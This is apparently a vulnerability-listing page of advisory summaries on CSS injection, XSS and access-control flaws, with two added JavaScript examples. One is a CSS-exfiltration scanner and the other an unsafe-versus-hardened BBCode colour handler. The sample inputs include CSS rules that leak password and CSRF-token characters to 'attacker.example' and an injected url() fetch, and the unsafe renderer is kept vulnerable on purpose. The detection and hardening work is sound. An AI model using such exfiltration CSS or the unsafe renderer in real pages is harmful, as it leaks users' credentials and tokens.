PT-2024-25257 · Unknown · Css Exfil Protection
Name of the Vulnerable Software and Affected Versions: CSS Exfil Protection version 1.1.0. Description: An issue in CSS Exfil Protection allows a remote attacker to obtain sensitive information due to missing support for CSS variables. Recommendations: For CSS Exfil Protection version 1.1.0, at th...
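The entry above concerns a CSS-exfiltration blocker that did not follow CSS variables. The block below is an added example, not code from CSS Exfil Protection or from any advisory on this page: a small scanner for flat stylesheets that flags the CSS-exfil pattern (a selector keyed on part of an attribute value, such as `[value^="a"]`, whose rule loads a remote `url()`), and that resolves `var()` references so a fetch routed through a custom property is still attributed to the attribute selector that set it. The sample stylesheet, the `attacker.example` host and all function names are constructed for illustration.

```javascript
// Added example (not code from CSS Exfil Protection or any advisory above).
// Flags the CSS-exfil pattern in a stylesheet: a selector that keys on part of an
// attribute value ([value^="a"], [value$="z"], [value*="xy"]) whose rule, directly
// or through a var() reference, loads a remote URL. Handles flat stylesheets only.

// Partial-value attribute selector: the part of the pattern that leaks one character per rule.
const ATTR_SELECTOR = /\[\s*[\w-]+\s*[\^$*]=\s*("[^"]*"|'[^']*'|[^\]\s]+)\s*\]/;
// Remote fetch (http, https or protocol-relative) inside url().
const URL_FUNC = /url\(\s*['"]?(?:https?:)?\/\/[^'")]+['"]?\s*\)/i;

// Split a flat stylesheet into [{ selector, decls: { property: value } }].
// Comments are stripped first; nested @-rules and data: URIs containing ';' are out of scope.
function parseRules(css) {
  const rules = [];
  const re = /([^{}]+)\{([^{}]*)\}/g;
  const src = css.replace(/\/\*[\s\S]*?\*\//g, '');
  let m;
  while ((m = re.exec(src)) !== null) {
    const decls = {};
    for (const part of m[2].split(';')) {
      const i = part.indexOf(':');
      if (i < 0) continue;
      decls[part.slice(0, i).trim()] = part.slice(i + 1).trim();
    }
    rules.push({ selector: m[1].trim(), decls });
  }
  return rules;
}

// Locate the first var(...) in a value, honouring nested parentheses in the fallback.
function firstVar(value) {
  const start = value.indexOf('var(');
  if (start < 0) return null;
  for (let i = start + 3, depth = 0; i < value.length; i++) {
    if (value[i] === '(') depth++;
    else if (value[i] === ')' && --depth === 0) {
      const inner = value.slice(start + 4, i);
      const comma = inner.indexOf(',');
      return {
        whole: value.slice(start, i + 1),
        name: (comma < 0 ? inner : inner.slice(0, comma)).trim(),
        fallback: comma < 0 ? null : inner.slice(comma + 1).trim(),
      };
    }
  }
  return null;
}

// Expand var() references into every concrete value they can take, recording the
// selector of each custom-property declaration used along the way ("chain").
function expand(value, customProps, chain, depth = 0) {
  const v = firstVar(value);
  if (!v || depth > 8) return [{ value, chain }]; // depth cap stops cyclic variables
  const decls = customProps.get(v.name) || [];
  const subs = decls.length ? decls : [{ selector: null, value: v.fallback ?? '' }];
  const out = [];
  for (const d of subs) {
    const next = value.replace(v.whole, () => d.value);
    out.push(...expand(next, customProps, d.selector ? chain.concat(d.selector) : chain, depth + 1));
  }
  return out;
}

function findExfilRules(css) {
  const rules = parseRules(css);
  const customProps = new Map(); // '--name' -> [{ selector, value }]
  for (const r of rules) {
    for (const [k, val] of Object.entries(r.decls)) {
      if (!k.startsWith('--')) continue;
      if (!customProps.has(k)) customProps.set(k, []);
      customProps.get(k).push({ selector: r.selector, value: val });
    }
  }
  const findings = [];
  for (const r of rules) {
    for (const [prop, val] of Object.entries(r.decls)) {
      if (prop.startsWith('--')) continue;
      for (const cand of expand(val, customProps, [r.selector])) {
        // Suspicious when the resolved value fetches a remote URL and either the rule's own
        // selector or one that supplied the variable keys on a partial attribute value.
        if (URL_FUNC.test(cand.value) && cand.chain.some(s => ATTR_SELECTOR.test(s))) {
          findings.push({ selector: r.selector, property: prop, url: cand.value.match(URL_FUNC)[0], via: cand.chain.slice(1) });
        }
      }
    }
  }
  return findings;
}

// Constructed sample stylesheet: one direct leak, one routed through a custom property, two benign rules.
const SAMPLE_CSS = `
input[name="password"][value^="a"] { background-image: url(https://attacker.example/leak?c=a); }
input[name="csrf_token"][value^="4"] { --leak: url(https://attacker.example/leak?t=4); }
input[name="csrf_token"] { background: var(--leak); }
input[type="submit"] { color: red; }
body { background: url(https://cdn.example.org/bg.png); }
`;

function demo() {
  return findExfilRules(SAMPLE_CSS);
}

console.log(JSON.stringify(demo(), null, 2));
```

Run with `node`: the direct rule is reported on its own selector, while the `var(--leak)` rule is reported with `via` pointing at the `[value^="4"]` selector that supplied the URL. A scanner that only looks at literal `url()` values in each rule would miss the second case, which is the gap the entry above describes.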
RHEL 9 : OpenShift Container Platform 4.13.8 (RHSA-2023:4459)
The remote Red Hat Enterprise Linux 9 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2023:4459 advisory. Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or privat...
RHEL 9 : OpenShift Container Platform 4.13.3 (RHSA-2023:3540)
The remote Red Hat Enterprise Linux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2023:3540 advisory. Red Hat build of MicroShift is Red Hat's light-weight Kubernetes orchestration solution designed for edge device deployments and is built fr...
CentOS 9 : toolbox-0.0.99.4-5.el9
The remote CentOS Linux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the toolbox-0.0.99.4-5.el9 build changelog. - Angle brackets are not considered dangerous characters when inserted into CSS contexts. Templates containing multiple actions separate...
USN-6748-1: Sanitize vulnerabilities
It was discovered that Sanitize incorrectly handled noscript elements under certain circumstances. An attacker could possibly use this issue to execute a cross-site scripting (XSS) attack. This issue only affected Ubuntu 22.04 LTS. (CVE-2023-23627) It was discovered that Sanitize incorrectly handled...
Ubuntu 20.04 LTS / 22.04 LTS / 23.10 : Sanitize vulnerabilities (USN-6748-1)
The remote Ubuntu 20.04 LTS / 22.04 LTS / 23.10 host has a package installed that is affected by multiple vulnerabilities as referenced in the USN-6748-1 advisory. It was discovered that Sanitize incorrectly handled noscript elements under certain circumstances. An attacker could possibly use thi...
WordPress ShortPixel Critical CSS plugin <= 1.0.2 - Broken Access Control vulnerability
Broken Access Control vulnerability discovered by Dhabaleshwar Das (Patchstack Alliance) in WordPress Plugin ShortPixel Critical CSS versions <= 1.0.2...
VulnCheck KEV: CVE-2024-32810
Missing Authorization vulnerability in ShortPixel ShortPixel Critical CSS. This issue affects ShortPixel Critical CSS: from n/a through 1.0.2...
WordPress ShortPixel Critical CSS Plugin <= 1.0.2 is vulnerable to Broken Access Control
Software: ShortPixel Critical CSS · Type: Plugin · Vulnerable versions: <= 1.0.2 · Fixed in: 1.0.3 · OWASP Top 10: A1: Broken Access Control · Classification: Broken Access Control · CVE: CVE-2024-32810 · Patch priority: High · CVSS severity: High 7.6 · Developer: ShortPixel · PSID: b4665651b428 · Credits: Dhabaleshwar Das · Require...
Add Custom CSS and JS <= 1.20 - Stored XSS via CSRF
Description: The plugin does not have CSRF checks in some places and is missing sanitisation as well as escaping, which could allow attackers to make users logged in as author or above add Stored XSS payloads via a CSRF attack. Make an author or above role open the following HTML: alert"frontendjs"' /...
KLA65693 Multiple vulnerabilities in Mozilla Thunderbird
Multiple vulnerabilities were found in Mozilla Thunderbird. Malicious users can exploit these vulnerabilities to execute arbitrary code, bypass security restrictions, cause denial of service, spoof the user interface, obtain sensitive information, or perform cross-site scripting attacks. Below is a...
sanmarino.no Cross Site Scripting vulnerability OBB-3916038
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...
CSS Injection
contao/comments-bundle is vulnerable to CSS Injection. The vulnerability is due to insufficient input validation and sanitization within the BBCode parsing mechanism in Comments.php, allowing attackers to inject CSS styles via comments...
CVE-2023-6486
The Spectra – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom CSS metabox in all versions up to and including 2.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with...
CVE-2023-6486 Spectra – WordPress Gutenberg Blocks <= 2.10.3 - Authenticated(Contributor+) Cross-Site Scripting via Custom CSS
The Spectra – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom CSS metabox in all versions up to and including 2.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with...
CVE-2023-6486
CVE-2023-6486 (Spectra – WordPress Gutenberg Blocks) Stored Cross‑Site Scripting via the Custom CSS metabox in Spectra. Affected: all versions up to 2.10.3. Root cause: insufficient input sanitization and output escaping in the metabox. Impact: authenticated attackers with contributor level or hi...
Contao: Insufficient BBCode sanitizer
Impact If BBCode is enabled for comments, users can inject CSS styles. Patches Update to Contao 4.13.40 or 5.3.4. Workarounds Disable BBCode for comments. References https://contao.org/en/security-advisories/insufficient-bbcode-sanitization For more information If you have any questions or commen...
GHSA-J55W-HJPJ-825G Contao: Insufficient BBCode sanitizer
Impact If BBCode is enabled for comments, users can inject CSS styles. Patches Update to Contao 4.13.40 or 5.3.4. Workarounds Disable BBCode for comments. References https://contao.org/en/security-advisories/insufficient-bbcode-sanitization For more information If you have any questions or commen...
CVE-2024-28234
Contao is an open source content management system. Starting in version 2.0.0 and prior to versions 4.13.40 and 5.3.4, it is possible to inject CSS styles via BBCode in comments. Installations are only affected if BBCode is enabled. Contao versions 4.13.40 and 5.3.4 have a patch for this issue. A...
CVE-2024-28234 Contao has insufficient BBCode sanitizer
Contao is an open source content management system. Starting in version 2.0.0 and prior to versions 4.13.40 and 5.3.4, it is possible to inject CSS styles via BBCode in comments. Installations are only affected if BBCode is enabled. Contao versions 4.13.40 and 5.3.4 have a patch for this issue. A...
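The Contao entries above describe CSS injection through BBCode in comments, fixed by tightening the BBCode sanitizer. The block below is an added example and is not Contao's code or the actual vulnerable parser: it shows the general pattern with a hypothetical `[color=...]` handler that writes the tag argument into an inline `style` attribute. The unsafe version HTML-escapes the argument (so there is no attribute break-out) but never checks that it is a colour, so extra declarations ride along; the hardened version accepts only a strict colour token and otherwise drops the tag while keeping the text. The named-colour allowlist, the sample inputs and the `attacker.example` host are constructed for illustration.

```javascript
// Added example, not Contao's code: a hypothetical BBCode [color=...] handler that renders
// an inline style attribute. The unsafe version trusts the tag argument, so a commenter can
// append extra declarations (CSS injection); the hardened version accepts only a strict
// colour token and otherwise drops the tag, keeping the text.

const COLOR_TAG = /\[color=([^\]]+)\]([\s\S]*?)\[\/color\]/g;

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Unsafe: the argument is HTML-escaped (no attribute break-out) but never validated as a
// colour, so anything CSS accepts inside a declaration block passes straight through.
function renderColorUnsafe(bbcode) {
  return bbcode.replace(COLOR_TAG,
    (_, color, text) => `<span style="color:${escapeHtml(color)}">${escapeHtml(text)}</span>`);
}

// Hardened: allowlist of named colours plus #rgb / #rrggbb; nothing else reaches the attribute.
// The allowlist is illustrative; extend it to whatever the site actually offers.
const NAMED_COLORS = new Set(['red', 'green', 'blue', 'black', 'white', 'gray', 'orange', 'purple']);

function isSafeColor(v) {
  return /^#(?:[0-9a-f]{3}|[0-9a-f]{6})$/i.test(v) || NAMED_COLORS.has(v.toLowerCase());
}

function renderColorSafe(bbcode) {
  return bbcode.replace(COLOR_TAG, (_, color, text) => {
    const c = color.trim().toLowerCase();
    const inner = escapeHtml(text);
    return isSafeColor(c) ? `<span style="color:${c}">${inner}</span>` : inner;
  });
}

// Constructed inputs: a legitimate tag and one that smuggles a background fetch into the argument.
const BENIGN = '[color=#FF0000]hello[/color]';
const INJECTED = '[color=red;background:url(https://attacker.example/leak)]hello[/color]';

function demoColor() {
  return {
    unsafe: renderColorUnsafe(INJECTED),
    safe: renderColorSafe(INJECTED),
    benign: renderColorSafe(BENIGN),
  };
}

console.log(demoColor());
```

The point of the check is that the tag argument is a CSS value, not HTML, so HTML escaping alone does nothing against `;` and `url()`; the value has to be validated against the grammar of what the tag is supposed to carry (here, a colour) before it is emitted into a style attribute.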